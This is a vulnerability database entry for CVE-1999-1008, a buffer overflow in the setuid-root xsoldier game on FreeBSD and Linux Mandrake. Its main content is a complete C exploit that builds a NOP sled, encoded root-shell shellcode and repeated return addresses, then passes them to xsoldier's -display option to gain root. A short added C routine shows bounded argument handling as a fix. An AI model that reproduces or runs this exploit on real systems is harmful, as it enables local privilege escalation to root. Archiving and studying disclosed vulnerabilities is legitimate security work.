FreeBSD and Linux Mandrake 'xsoldier' Buffer Overflow Vulnerability
Vulnerability ID | 1105839 | Vulnerability type | Boundary condition error |
Published | 2000-05-17 | Updated | 2005-05-02 |
CVE | CVE-1999-1008 |
CNNVD ID | CNNVD-200005-069 |
Platform | Linux | CVSS score | 7.2 |
|Vulnerability source
|Vulnerability details
The xsoldier program contains a vulnerability: a local user can pass an overly long argument to gain root access.
|Exploit
/*
source: http://www.securityfocus.com/bid/871/info
Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console.
The binary itself is subject to a buffer overflow attack (which may be launched from the command line) which can be launched to gain root privileges. The overflow itself is in the code written to handle the -display option and is possible to overflow by a user-supplied long string.
The user does not have to have a valid $DISPLAY to exploit this.
*/
/*Larry W. Cashdollar linux xsoldier exploit.
*[email protected] http://vapid.dhs.org
*if xsoldier is built and installed from its source it will be installed
*setuid root in /usr/local/games
*original exploit found by brock tellier for freebsd 3.3 ports packages.
*If a setregid() call is placed in the shellcode, you can get egid=12
*with the default mandrake installation.*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memcpy */
#include <unistd.h>   /* execl */
#define NOP 0x90 /*no operation skip to next instruction. */
#define LEN 4480 /*our buffersize. */
char shellcode[] = /*execve with setreuid(0,0) and no '/' hellkit v1.1 */
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
"\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
"\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
"\xc2\x91";
/*Nab the stack pointer to use as an index into our nop's*/
long
get_sp ()
{
    __asm__ ("mov %esp, %eax");
}
int
main (int argc, char *argv[])
{
    char buffer[LEN];
    int i, offset;
    long retaddr = get_sp ();
    if (argc <= 1)
        offset = 0;
    else
        offset = atoi (argv[1]);
    /*#Copy the NOPs in to the buffer leaving space for shellcode and
    #pointers*/
    for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
        *(buffer + i) = NOP;
    /*[NNNNNNNNNNNNNNNNNNNNN ]*/
    /* ^-- LEN -(strlen(shellcode)) - 100*/
    /*#Copy the shell code into the buffer*/
    memcpy (buffer + i, shellcode, strlen (shellcode));
    /*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSS ]*/
    /* ^-(buffer+i) */
    /*#Fill the buffer with our new address to jump to esp + offset */
    for (i = i + strlen (shellcode); i < LEN; i += 4)
        *(long *) &buffer[i] = retaddr + offset;
    /*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSRRRRRRRRRRRRR]*/
    /* ^-(i+strlen(shellcode))*/
    printf ("Jumping to address %lx BufSize %d\n", retaddr + offset, LEN);
    execl ("/usr/local/games/xsoldier", "xsoldier", "-display", buffer, (char *) NULL);
    return 0;
}
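Added here as a defensive illustration, not part of this record and not xsoldier's source: the kind of bounded handling of the -display argument that would have closed the overflow described above. DISPLAY_MAX, set_display() and the display-name grammar check are assumptions.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

#define DISPLAY_MAX 256   /* assumed size of the program's display buffer */

/* Return 1 if s is shaped like an X display name "[host]:display[.screen]". */
static int display_syntax_ok(const char *s)
{
    const char *colon = strchr(s, ':'), *p;
    int dots = 0;
    if (colon == NULL || !isdigit((unsigned char)colon[1]))
        return 0;
    for (p = s; p < colon; p++)          /* host: letters, digits, '-', '.' */
        if (!isalnum((unsigned char)*p) && *p != '-' && *p != '.')
            return 0;
    for (p = colon + 1; *p; p++) {       /* display[.screen]: digits, one dot */
        if (*p == '.' && ++dots == 1 && isdigit((unsigned char)p[1]))
            continue;
        if (!isdigit((unsigned char)*p))
            return 0;
    }
    return 1;
}

/* Hardened replacement for an unchecked copy of the -display argument: refuse
 * anything that does not fit dst or is malformed. 0 = stored, -1 = rejected. */
int set_display(char *dst, size_t dstsz, const char *arg)
{
    size_t n = strlen(arg);
    if (dstsz == 0 || n >= dstsz || !display_syntax_ok(arg))
        return -1;                       /* dst is left untouched */
    memcpy(dst, arg, n + 1);             /* n < dstsz, so the NUL fits */
    return 0;
}

/* Push a constructed ":000...0" argument of total length n (the exploit above
 * passes 4480 bytes) through set_display(); 1 = accepted, 0 = rejected. */
int accepts_display_of_len(size_t n)
{
    char buf[DISPLAY_MAX], *arg = malloc(n + 1);
    int ok;
    if (arg == NULL || n < 2) { free(arg); return 0; }
    arg[0] = ':';
    memset(arg + 1, '0', n - 1);
    arg[n] = '\0';
    ok = set_display(buf, sizeof buf, arg) == 0;
    free(arg);
    return ok;
}
```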
|References
Source: BID
Name: 871
Link: http://www.securityfocus.com/bid/871
Source: marc.theaimsgroup.com
Link: http://marc.theaimsgroup.com/?l=freebsd-security&m;=94531826621620&w;=2